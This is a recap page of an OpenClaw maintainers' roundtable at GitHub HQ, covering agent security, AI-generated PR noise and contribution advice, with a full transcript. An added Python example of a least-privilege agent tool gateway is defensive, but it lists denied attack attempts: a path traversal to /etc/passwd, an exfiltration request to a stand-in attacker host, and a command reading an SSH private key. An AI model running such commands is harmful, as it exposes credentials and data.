
PRIVATE ROUNDTABLE · GITHUB HQ · MAINTAINERS

THE MAINTAINER LAYER

Agents move fast. Humans keep it real.

After the OpenClaw fireside, the people keeping the project alive got practical: security at agent scale, AI-generated PR noise, how to contribute without wasting maintainer time, and why open source still needs humans talking to humans.


THE SECOND CONVERSATION

The first conversation was about why OpenClaw feels like a new platform moment. This one is about what happens after the platform moment arrives — the less-glamorous, more important layer underneath the hype.

Security advisories. Duplicated PRs. Agent-assisted triage. Memory, identity, auditability — and the social contract of open source when every contributor has a clanker in the loop. This is the behind-the-scenes page.

THE GIST

Eight things the maintainers are actually solving.

01

Young, but at scale.

OpenClaw exploded around mid-January and is already dealing with issue, PR, and security-advisory volume that most maintainers never see.

02

Security isn't a bolt-on.

The team sorts through a flood of GitHub Security Advisories, which the maintainers estimate at 85 to 90 percent AI-generated slop, while still treating every report seriously.

03

Secure agents like employees.

The strongest frame of the night: don't secure agents like software. Secure them like people with access — identity, permissions, logs, SSO, sandboxing, audit trails.

04

The PR changed.

Maintainers don't need more raw AI-generated pull requests. They need proof, context, project-convention awareness, related-issue mapping, and the tradeoffs spelled out.

05

"Prompt requests" count.

If the idea is good but the implementation isn't, bring the idea. A clear issue can be worth more than a fragile PR.

06

Agents reviewing agents.

OpenClaw already runs every issue and PR through an LLM and clusters the output to collapse duplicates; one such pass cut roughly 10,000 open PRs to around 5,000, and the maintainers closed about half of those by hand over the next few days.

07

Open source is still human.

The maintainers keep coming back to Discord, calls, screenshots, videos, validation, patience, and community norms. The agent layer should not erase the human layer.

08

Domain experts are the next builders.

Best adoption line of the night, from outside Silicon Valley: "You're the AI expert. You just don't know it." People with decades of domain knowledge can finally build the tools their industries actually need.

"The more eyes on OpenClaw, the more people using it — that's the fastest way to make it the most robust project ever."

— Ashley Wolf, GitHub

"Please don't be delusional and think it's a good idea to just not accept PRs from agents. Eventually you're going to have to get over it."

— Sally, Red Hat

"We want a prompt request. If you don't want to bring code, we can bring code to it — but bring your ideas."

— the maintainers

"The best PRs consider the conventions of the project."

— Josh, OpenClaw Foundation

"You can't secure these agents the way you'd secure traditional software. You have to secure it like an employee."

— Jacob Tomlinson, NVIDIA

"Ask your clanker: is this the most robust way to do this?"

— heard in the room

"Open source is a community activity. It's humans working with other humans on stuff."

— Jacob Tomlinson, NVIDIA

"You're the AI expert. You just don't know it."

— Brad, Digital Meld

THE PANEL

Photo: The OpenClaw maintainer panel seated on stage at GitHub HQ, with the cyan Octocat glowing on the screen behind them. The maintainer layer, live from GitHub HQ. Seven people keeping agentic open source honest.

HOW TO CONTRIBUTE
WITHOUT ADDING NOISE

The field guide. Genuinely useful, no fluff.

01

Read before you ship.

Have your agent crawl the recent issue, PR, and plugin history. Understand the conventions before touching code.

02

Bring proof.

Screenshots, screen recordings, test output, validation notes, or "I tried this as a human" evidence — it jumps a contribution straight up the queue.

03

Map the work.

Name the issues it closes, the related ones it doesn't close, and why.

04

Avoid fragile fixes.

Ask the agent whether the solution follows project conventions and whether it's the most robust way to solve the problem.

05

Use prompt requests.

Real issue, non-obvious implementation? Write a clear problem statement and let the maintainers — or their agents — bring the code.

06

Don't spam the @s.

If it's truly urgent, it'll be clear. Otherwise, patience is part of the contribution. Maintainers have lives — and jobs — too.

07

Talk to humans.

Join the community spaces, explain what you're trying to solve, and remember that open source is still people working with people. Come to Discord. Come to the call.

FROM YOLO TO LAYERS

The answer to agent security isn't denial, and it isn't panic. It's layered control.

01

Sandbox it.

Run agents in contained or sandboxed environments where appropriate — not bare on your laptop with all your credentials.

02

Give it an identity.

Its own identity, credentials, and tokens. Not yours.

03

Least privilege.

Limit what it can talk to and what it can access.

04

SSO + IdP controls.

Put single sign-on and identity-provider controls in front of it, the way you would a person with system access.

05

Audit + log.

Track what it does. Keep the logs. Make every action accountable.

06

Onboard it like a hire.

Treat an agent with the same seriousness you'd give a new employee with access to your systems.
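As an added illustration of the layers above (example code written for this recap, not OpenClaw's own code or configuration), here is a small Python tool gateway that gives an agent its own principal, enforces a least-privilege grant over tools, hosts and path prefixes, and writes every attempted action to a hash-chained audit log. Every name, the sample grant and the in-memory file and web backends are assumptions made for the example; SSO and the sandbox boundary are out of scope here and would sit in front of and around this process.

```python
"""Added example (not OpenClaw code): a least-privilege tool gateway for an agent.

The agent runs under its own principal, carries an explicit grant of tools,
hosts and path prefixes, and every attempted action, allowed or denied, is
appended to a hash-chained audit log. All names and sample data are assumptions.
"""
from __future__ import annotations

import hashlib
import json
import os
import time
from dataclasses import dataclass
from typing import Any, Callable
from urllib.parse import urlparse


@dataclass(frozen=True)
class AgentIdentity:
    """The agent's own identity: its principal, the accountable human, its grant."""
    agent_id: str                   # e.g. "agent:triage-bot", never the operator's login
    owner: str                      # human accountable for what this agent does
    allowed_tools: frozenset[str]
    allowed_hosts: frozenset[str]
    allowed_paths: tuple[str, ...]  # absolute path prefixes the agent may touch


class Denied(PermissionError):
    """Raised when the gateway refuses a tool call."""


class AuditLog:
    """Append-only log; each entry commits to the hash of the previous one."""

    GENESIS = "0" * 64

    def __init__(self) -> None:
        self.entries = []          # list of dict entries, oldest first
        self._prev = self.GENESIS

    @staticmethod
    def _digest(body: dict) -> str:
        return hashlib.sha256(json.dumps(body, sort_keys=True).encode()).hexdigest()

    def record(self, agent_id: str, tool: str, args: dict, decision: str, reason: str = "") -> None:
        entry = {"ts": time.time(), "agent": agent_id, "tool": tool, "args": args,
                 "decision": decision, "reason": reason, "prev": self._prev}
        digest = self._digest(entry)   # hash covers everything but the hash field itself
        entry["hash"] = digest
        self.entries.append(entry)
        self._prev = digest

    def verify(self) -> bool:
        """Recompute the chain; an edited, dropped or reordered entry breaks it."""
        prev = self.GENESIS
        for e in self.entries:
            body = {k: v for k, v in e.items() if k != "hash"}
            if body["prev"] != prev or self._digest(body) != e["hash"]:
                return False
            prev = e["hash"]
        return True


class ToolGateway:
    """Mediates every tool call: check the grant, log the decision, then run."""

    def __init__(self, tools: dict[str, Callable[..., Any]], log: AuditLog) -> None:
        self.tools = tools
        self.log = log

    def _check(self, who: AgentIdentity, tool: str, args: dict) -> str | None:
        if tool not in self.tools:
            return f"unknown tool {tool!r}"
        if tool not in who.allowed_tools:          # deny by default: no grant, no call
            return f"{who.agent_id} is not granted {tool!r}"
        if "url" in args:
            host = urlparse(args["url"]).hostname or ""
            if host not in who.allowed_hosts:
                return f"host {host!r} is not in the allowlist"
        if "path" in args:
            p = os.path.normpath(args["path"])     # collapses '..' before the prefix check
            if not os.path.isabs(p) or not any(
                p == a or p.startswith(a.rstrip("/") + "/") for a in who.allowed_paths
            ):
                return f"path {p!r} is outside the allowed prefixes"
        return None

    def call(self, who: AgentIdentity, tool: str, **args: Any) -> Any:
        reason = self._check(who, tool, args)
        if reason:
            self.log.record(who.agent_id, tool, args, "deny", reason)
            raise Denied(reason)
        self.log.record(who.agent_id, tool, args, "allow")
        return self.tools[tool](**args)


# Constructed stand-ins so the example runs offline; a real deployment would back
# these with a sandboxed filesystem and an egress proxy.
FAKE_FS = {"/workspace/repo/README.md": "# repo\nconventions live in CONTRIBUTING.md\n"}
FAKE_WEB = {"https://api.github.com/repos/acme/repo/issues": "[]"}


def read_file(path: str) -> str:
    return FAKE_FS[os.path.normpath(path)]


def http_get(url: str) -> str:
    return FAKE_WEB[url]


def run_shell(cmd: str) -> str:
    raise AssertionError("unreachable here: the sample agent is never granted run_shell")


def demo() -> tuple[list[str], AuditLog]:
    """Drive the gateway with one agent; return the per-call decisions and the log."""
    log = AuditLog()
    gw = ToolGateway({"read_file": read_file, "http_get": http_get, "run_shell": run_shell}, log)
    bot = AgentIdentity(agent_id="agent:triage-bot", owner="alice@example.com",
                        allowed_tools=frozenset({"read_file", "http_get"}),   # no shell
                        allowed_hosts=frozenset({"api.github.com"}),
                        allowed_paths=("/workspace/repo",))
    attempts = [
        ("read_file", {"path": "/workspace/repo/README.md"}),                   # in scope
        ("read_file", {"path": "/workspace/repo/../../etc/passwd"}),            # traversal
        ("http_get", {"url": "https://api.github.com/repos/acme/repo/issues"}),  # allowed host
        ("http_get", {"url": "https://attacker.example.net/exfil?d=secret"}),    # egress blocked
        ("run_shell", {"cmd": "cat ~/.ssh/id_ed25519"}),                        # tool not granted
    ]
    decisions = []
    for tool, args in attempts:
        try:
            gw.call(bot, tool, **args)
            decisions.append("allow")
        except Denied:
            decisions.append("deny")
    return decisions, log


if __name__ == "__main__":
    d, audit = demo()
    print(d, "chain intact:", audit.verify())
```

The points to take from it map onto the list above: the agent never holds the operator's credentials, it is denied by default, a path traversal is normalized before the prefix check, and a denied attempt is logged with the same care as an allowed one, so the log records what the agent tried to do, not only what it managed to do. Editing an entry after the fact breaks the chain, which is what makes the log usable as an audit trail rather than a debug print.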

TL;DR

OpenClaw is powerful. Give it respect.

OpenClaw's magic is that it gives a user and their computer a lot of agency — that's exactly what makes the security story different. The maintainer answer to "is it safe?" isn't YOLO and it isn't fear. It's the same layered architecture you'd give any new hire with the keys. Configure it properly.

THE FULL RECORD · UNCUT · ON THIS PAGE

The Roundtable

The whole maintainer roundtable, lightly cleaned up and kept exactly here — no PDF, no link-out, no separate page. Pull up a chair.

Introductions & Origin Stories [00:00]

Ashley Wolf First, I'd love for you to introduce yourself. Talk briefly about what you're maintaining on OpenClaw and how you came into the project. I'll start with you.

Control UI I do Control UI. I design the UI/UX, as well as some of the iOS stuff, not all of it yet. Both of them are in the macOS app, and also the V2 for the UI periphery, call hub, and control hub. That's mostly it, plus opinions by other people.

Ashley Wolf How did you come to join OpenClaw as a maintainer?

Control UI I had to beg and plead and email and email and email, and make multiple dashboards, very nice-looking, only to be told I had to write in a new framework, so it was not going to be as nice-looking. But I tried very hard.

Ashley Wolf And you made it.

Control UI Hopefully I made it. And if I didn't, I'm open to suggestions.

Jacob I'm Jacob Tomlinson. I work for NVIDIA. We're mainly providing security assistance to OpenClaw. We spend a lot of time going through the security advisories being opened against OpenClaw and figuring out what is noise, what is relevant, what we need to fix, what we can harden, and what we can change within OpenClaw.

Jacob We also maintain the NVIDIA interactions on the side. We got involved because Peter originally reached out to NVIDIA to partner with us and see how we could come in and support the project. NVIDIA has a bunch of people working on open-source libraries in different places, so a few people were put together. I love open-source projects, and this seemed like a great opportunity for multi-institutional open source: getting big companies working together to help a nonprofit. It seemed like exactly the right thing to back.

Ashley Wolf That's one way. Begging and pleading is another. Getting invited. Excellent. Sally?

Sally I'm Sally. I work for Red Hat. How I got into OpenClaw is: I went rogue. We definitely were not supposed to run OpenClaw on our laptops. I was on a few days off, and I installed it, and I instantly felt this was the most important project I had ever experienced.

Sally So I went back into Red Hat. It was everybody's day off; we have these recharge days. I went into Slack and said, "Guys, have you tried this new project, OpenClaw?" Instantly a few people were like, "Don't run OpenClaw. It's so insecure. What are you doing?"

Sally And I said, "Hello, what have I been working on for the past 11 years? I've been working on our product that is supposed to run any application securely. It's OpenShift, right? If we can't run this properly, what are we doing?"

Sally Then I see the three dots. Dot, dot, dot. It was one of the executives. I was like, "Oh yeah, this is on." He came in and said, "That's right, Sally. That's exactly what I'm talking about." From there, I emailed like everybody else did, and here I am.

Ashley Wolf Excellent. Brad?

Brad How can I follow Sally? She's the enthusiasm that brings up all of us negative nancies every time, so big ups for Sally.

Brad I'm Brad, CEO of Digital Meld. I focus on technology innovation for mid-market companies and help them punch above their weight class. I focus on AI automation. I came across this from the Microsoft Teams perspective. Peter told a funny story today that he almost didn't publish the plugin for Microsoft Teams. If he hadn't done that, I don't know if I would be here right now, so I'm glad he did.

Brad That got some intros into Microsoft, and a lot of what you see today came from that. Thank you to Microsoft for everything they've done. My goal is to reduce friction between Microsoft software and services. I would say OpenClaw has been enterprise-ready since day one because of Entra ID, because of Graph API, and because of all those sorts of things. It's great to see Microsoft giving that back to the world.

Ashley Wolf Vincent?

Vincent I'm Vincent. For those of you who don't know me, I'm Chief Architect at OpenClaw Foundation. I joined as a contributor pushing PRs in December or January, but I was obsessed. I literally had my clock set. I was saying, "This is going to change the world." Some people in this room will remember me saying that, and they probably thought I was crazy. So I get the last laugh.

Vincent What became my entry was that I needed in. I needed to be part of this project. So I hit Peter where I knew I could get his attention: I started doing security advisories. I created such a mess of a problem that he said, "You have to come join and fix the problem you started." Here we are today.

Josh I'm Josh. I'm with the OpenClaw Foundation too. I followed Peter on Twitter before OpenClaw took off in January. I saw it when it was his little side project in Marrakesh. I took some time off during the December holidays, came back, and took some time off from my job to start playing with AI. I discovered OpenClaw in January. Peter was saying, "Help, I need maintainers." I had just taken time off my job, so I was like, "Well, I'm not doing anything." It's been full throttle since. Here we are.

Security at Agent Scale [05:54]

Ashley Wolf Thank you all for being here. We heard a little bit about security. Security is a hot topic with OpenClaw. Some of you participated in the GitHub Secure Open Source Fund and program. I'd love to hear about your security journey and the project, and a little about the program if you can share.

Maintainer I can jump in. We're at a time right now where I think we're probably one of the biggest targets of a new wave of AI bug reports. It's really easy to find vulnerabilities in open-source code right now, and we're one of the bigger open-source projects at the moment, so we get a lot of security advisories.

Maintainer It's an especially hard problem because some of the magic of OpenClaw is a certain YOLO mode about it. We want to enable a permissive environment. We want it to be you and your computer doing whatever you want to do. But everybody's definition of safe and secure is different. In an enterprise context, that is not acceptable.

Maintainer We're getting a ton of bug reports and breaking in new and interesting ways every day. It was very hard for a while. Then NVIDIA came along and has been invaluable in helping us wrangle those. I think 85 or 90 percent of the GHSAs — the GitHub Security Advisories we received — were slop. Actual slop. But we still treat every single one of them seriously, because we have to. We cannot not take people's security seriously. It does drain a little bit.

Jacob It is dealing with the volume of stuff coming in. I've worked on open-source projects before as a maintainer. On a 10,000-star project, you might get single-digit security advisories or CVEs per year. You go through the process. You make the private fork or branch, fix the thing, time the release so the bug fix goes straight in, and everybody can pick it up.

Jacob How do you scale that when you're getting 60 bug reports a day, or triple digits on some days? You still need to treat every one with the same seriousness. You need to look at it and ask: Is this a real bug? Is this by design?

Jacob People are freaking out about the whole agent thing because it can call bash. It can do all sorts of things. So with this whole class of bugs, people say, "It can accidentally call exec," or do something else. But it can call exec by design. How do we mitigate that? We cannot change the philosophy of OpenClaw, otherwise it's not OpenClaw anymore. We need to mitigate these risks in other ways.

Jacob You cannot treat securing these agents in the same way you would treat securing traditional software. You always have to treat it like securing an employee. If you hire someone into your company, you cannot control everything they do. There is a certain amount of risk in having someone work for you and giving them access to systems.

Jacob So you set up a layered architecture: tracking what they do, giving them single sign-on, giving them access to different applications in controlled ways. We need to treat agents in that same way and have that layered architecture to secure them. We cannot just think of pull requests that fix security stuff. We have to design a whole system and stack to deal with it.

Ashley Wolf The more eyes on OpenClaw, and the more people using OpenClaw, the faster we make it the most robust project ever. That's the story of open source. That's what makes it so powerful.

Sally I have one point to think about. Please don't be delusional and think that it is a good idea to not accept PRs from agents, because eventually you're going to have to get over it. It's going to happen. It's going to be the future. If you want people to use your technology, you should expect that to happen.

Sally Fortunately, we have a magician on our side who knows Defense Against the Dark Arts. You can use agents against agents. They can be great at bash, as can you. You can put money behind it if money comes into play. Not all of us have [unclear] bucks, but for those who don't, there are sponsorships. You can use your resources to think about that and try to write that into the validation.

Sally There are a lot of open-source tools in our repo on GitHub. Fork it, play with it, turn it on. I think they're really helpful. I've been using them for deduplication, triages, and that helps as well.

The Contribution Surge & Tooling [10:39]

Ashley Wolf I want to dig in on what you touched on. There are more contributions on GitHub than ever before, maybe some of it thanks to OpenClaw and the rise of AI. We've seen phenomenal accelerated growth on the platform: users, contributions, more people doing open source than ever before. First, let's celebrate and appreciate that.

Ashley Wolf What are some of the tools or signals you use as you look at tens of thousands of issues and PRs? Can you share some of the tools you've already made, or quick signals you're using to evaluate what is coming into the platform?

Vincent One of the things most maintainers try to do when they first join is: "Oh my God, there are so many issues. There are so many PRs. I'm going to automate this." What we ended up doing was simpler than most people think.

Vincent We take every issue and PR, feed it through an LLM, and ask it three questions. The output gets clustered. That cluster is immutable, and every PR and issue gets bundled together. It is relatively cheap and relatively quick.

Vincent We quickly found that people's clients were essentially raising issues and PRs for the same issue. Lots of duplication. One night, it went from 10,000 PRs down to around 5,000. Peter and I probably closed half of them in a span of around 70 hours because most of it was heavy duplication. A lot of it was already solved or already resolved, but it was noise.

Vincent That was one solution: how do we combat the noise? How do we know which issue or PR is a regression? Subsequent to that, everyone started chipping in, and we started creating more automation around how we run agents on top of PRs. That's the factory stuff Peter was mentioning earlier.

Sally I'm currently unlearning everything I did over the past 12 years as a software engineer. That's really what we all have to do. These tools are making it possible.

What Good Contributions Look Like Now [12:56]

Ashley Wolf Before we turn it over for questions, what should people do? How should they craft contributions in a way that adds value, gets seen, and makes you want to reply and work with them? What do you suggest to folks who want to get involved in OpenClaw, or any open-source project?

Maintainer Do our job very well for us. Identify the implications. Identify the issues you're closing. Prioritize them. Say why you are leaving other related issues out there. If you do the things we would otherwise have to do ourselves, that obviously helps us.

Maintainer Another thing is, if you cannot do that, maybe just create an issue and let us come up with a solution. You may not come up with a solution that is the best thing ever. We have to realize our agents are not perfect. They make mistakes, and they make very convincing mistakes. Do not be fooled by those mistakes. Be aware that if you do not understand a topic, you probably should not make a PR about it.

Ashley Wolf I've heard Peter say exactly what you're talking about and call it a prompt request. We want a prompt request. If you do not want to bring code, we can bring code to it, but bring your ideas. Anyone else on what a good contribution could look like now with AI and open source?

Jacob One of the big things we've found is that open source is a community activity. It's humans working with other humans on stuff. We're all using agents to do this and accelerate ourselves, and it is building a buffer between us.

Jacob If you look at the issues and pull requests, they are all agent-written. So come to Discord. Come to the community places. Come join the [unclear] channel on Discord and talk to other humans about what you're working on, what you want to do, and what problems you want to solve. Together we can handle the code side and dealing with the agents and GitHub. But ultimately, we still need human-to-human communication.

Jacob That is the next thing we need to figure out collectively: how we avoid losing that. I think that's the biggest threat to all this. We still all need to work together. We hang out in a call all the time. Peter is basically always in this call, and we can drop in and talk to each other. There is still a huge human side to it. If you only look at PRs and issues, you cannot see that interaction, so we need other places to have it.

Jacob The other piece is proof. If you can attach proof, like a screenshot or video, or say, "I tested this as a human, I validated this," it jumps straight to the top.

Josh Jacob and Vincent covered the two biggest parts, but I would elaborate on what Vincent said: talk to your agent more. The best PRs consider the conventions of the project. They are not one line: "I have this problem, fix this thing. Okay, push."

Josh Find out the conventions. Make sure what you're doing is not going to cause regressions. Ask your clanker, "Is this the most robust way to do this?" The biggest reason I would opt not to use a contributed PR is because it goes against the conventions of the project, or it's a fragile fix. So talk to your clanker. Spend time with it.

Maintainer When you talk to your clanker, Peter added a tool where you can upload the transcript with your agent. That tells us how much time you spent thinking about the problem and trying to solve it. That is very valuable.

Maintainer Utilize the history of the problem you're trying to solve. If it is for a specific plugin, check the history of that plugin and see what PRs were pushed through and reversed. It will give you a roadmap of what the maintainers are looking for.

Ashley Wolf I like the suggestion that contributions look different now. They might come in all shapes and flavors. It could just look like joining the community, listening, and participating.

Maintainer Yes, absolutely. I hear there are interesting music sessions and multi-music dance parties happening on Discord, so anybody can join in on that.

Sally I will be slightly contrary. I see people writing in PR comments, tagging people, saying, "Please, somebody." Then they have other bots saying, "Please stop tagging everybody. Please don't do this anymore." Sometimes when you see humans in there, it is a very sad story. Do not be that sad story.

Sally If it is really, really important, trust me, you'll know. If it is not, you do not need to keep telling it over and over again. We also have lives. We are human beings. Most of us have jobs too. Be patient and understanding.

Sally The team has an intentionality to do the absolute best for everyone. We have a lot of [unclear]. Some of us become extremely overly productive and obsessive about that.

Jacob This does not apply only to OpenClaw. It applies to any open-source project. I would almost go as far as saying it applies to other repositories inside organizations adopting agentic AI. This level of speed and noise and AI and security is impacting everyone.

Ashley Wolf There are people behind projects. People with agents, maybe, in a lot of them. But we all work together in open source, and we want to create welcoming environments. So yes, be nice to the maintainers, especially maintainers receiving piles and piles of contributions that they truly want to go through.

Ashley Wolf Together, we can continue to make OpenClaw amazing and successful. Please do consider getting involved. This project is around four and a half or five months into this level of growth. You're still a young project. There is plenty of time for people to get involved.

Q&A: "Is OpenClaw Insecure?" [19:47]

Matt I run a lot of workshops where I help people install OpenClaw. The number one complaint I get over and over is: "It's not secure. What do I do to install it?" It creates a lot of unnecessary hurdles. I know the answer is just go ahead and install it, but I don't think that's enough for folks who have heard over and over that it is insecure. What would you recommend other than "YOLO"?

Brad There is so much of that. It has to be more than a quick answer. I install OpenClaw for businesses, and I am seeing it transform actual businesses today. One of my customers said it well. The CEO said, "We're juggling knives now." Nobody really knows what the future holds. Dave mentioned earlier that we're in the late nineties, the early days of the internet. Think of what you missed out on if you had an idea and did not see it through.

Brad I tell people it is risk versus reward. Everything is dangerous. OpenClaw is a tool. You have the ability to lock it down and give it the access you choose. Whatever agency you give it, that is on you. You have to take ownership.

Brad From a business perspective, show the ROI. If I can automate 80 percent of someone's menial tasks so they can focus on meaningful tasks to grow the business, it sells itself. I focus on the positive: here is what people have built when they took these steps. We can argue all day whether it is safe or not safe.

Brad And this week at Microsoft Build, Microsoft announced Scout. That's OpenClaw backed by Microsoft, with thousands of employees at Microsoft using it. If you need a proof point about a huge enterprise, there you go.

Jacob This is the thing: having different companies come in and add layers of security around it. OpenClaw is still OpenClaw. The scariest way to run OpenClaw is to install it as me on my laptop with access to all my stuff, all my credentials, everything. That is terrifying.

Jacob But if I put it in a contained environment, a sandboxed environment, run it in the cloud, put layers of authentication around it, give it its own identity and tokens, limit what it can talk to and access, audit things, and log things, that is the layered architecture I mean.

Jacob If you take OpenClaw and run bare OpenClaw, you're kind of on your own. But you can also go to Microsoft or whoever else is building structures around it to get an enterprise-packaged solution.

OpenClaw It is a thousand small things, and it starts from the lowest level of the operating system up. The bottom line is that AI is super powerful, so you have to give it that respect and configure it properly.

Q&A: Memory Systems [23:25]

Barron I'm Barron. I'm at Google. I help run the OpenClaw community at Google. It is amazing to see the January moment. We came back from break and, in classic Google fashion, seven OpenClaw variants spun up and tried to be the winner.

Barron The community we run at Google wanted me to ask: how do you run your memory systems? OpenClaw pioneered a very simple one, but it was very effective. Everybody has complicated ideas, and there is a lot of community discussion about what's great. Is it Gary's Brain? Is it other things? I'm curious how you run your own stuff.

Brad I can take this at least a little bit, because I do this for businesses and small teams. The memory system OpenClaw uses now can scale for a small or medium team. Scaling it to an enterprise perspective is a trillion-dollar idea that Microsoft and others are trying to solve.

Brad How do you share these markdown files from personal agents back to a centralized place and understand how it works across your business? The beauty is that they are markdown files, so you can use GitHub to share them with teammates securely, or Azure DevOps, or other solutions. That is what I do internally and what I do for my customers.

Brad If my fellow employees have a meeting with a client, I have access to their memories, and they have access to mine. Over time, you start small and build those things out.

Brad Things like Gary's Brain are great, but the way I see OpenClaw is that you need to make it yours. For you or your organization. I would point your OpenClaw at Gary's Brain and say, "You know my workflow. I've been working with you for three or four months. What from this repo should we use?" Then build your own. That is the real power of OpenClaw. You make it the foundation for everything you build.

Brad Take what other people do as inspiration, but put your own spin on it. Your secret sauce, that last 20 percent, is what makes you special, and that's what makes your agent special.

Maintainer One of the things we're working on in the background is releasing benchmarks. Scott is another maintainer here, and we're working with a few other people around evaluating long-running tasks and various personal AI-agent tasks, to understand which configuration is most ideal.

Maintainer But this is going to change. Something might work this week and change in three weeks. A new model will come out, and it will change. I can give you an answer now, but it is only based on what's good today. Be comfortable being uncomfortable. I think that's the future we live in.

Q&A: Adoption, Identity & Auditability [26:08]

Avril My name is Avril. I work in financial services, and I am a founder. My question is three-part, but you can answer at least one of them. What do you think the system is fundamentally missing in agent infrastructure today? Have you seen adoption in any industry in particular? How do you approach identity, consent, and auditability in agents?

Brad I can speak to adoption because I use this in industry. I focus mainly on blue-collar work. I'm from Houston, Texas, so oil and gas, construction, engineering, those types of industries. You would think those people would not be interested in these tools, but once you show them the possibilities, they are.

Brad I tell people all the time, "You're the AI expert. You just don't know it." These are people who are not technical, but they have 20 or 30 years of institutional knowledge and experience that makes them indispensable.

Brad I know the tools. I'm an "AI expert," quote-unquote, although nobody is. My goal is to share these tools with you so you understand how to better unlock your potential. Nobody in Silicon Valley has the institutional experience to build something for someone working in the oil fields of West Texas.

Brad The goal is for those people to learn the tools and build the systems that transform their businesses. I challenge everyone here with a 30-day challenge: how can I upskill myself in my space and unlock those potentials? From an auditing perspective, the memory is markdown files, and markdown files are auditable.

Jacob We're going to have to treat agents like we treat humans. The layers we have for auditing, tracking, and identifying humans working on systems are the same things we'll need for agents: identity providers and related controls.

OpenClaw Because this is a Microsoft-related event, Agent 365 is relevant. If you have not heard of that yet, the idea is creating an identity inside Microsoft 365 and Azure that is fully auditable and controllable by things like Microsoft Sentinel. That is one reason Microsoft is rolling these things up.

Closing Thanks [28:34]

OpenClaw I want to say thank you to everyone from OpenClaw. Actually, I want to give another shout-out to the other maintainers because I'm by far not the most productive maintainer of the bunch. These people work 24 hours a day, and I want to make sure they get recognized.

Ashley Wolf Thank you all for joining us today. We're so happy you came to the GitHub office. We wanted to hang out and celebrate with you the success of open source, what's been happening on GitHub, and the tremendous growth. If you're interested in chatting more with people from OpenClaw, we'll be hanging out here for the next bit. Thank you all for joining us. [recording ends]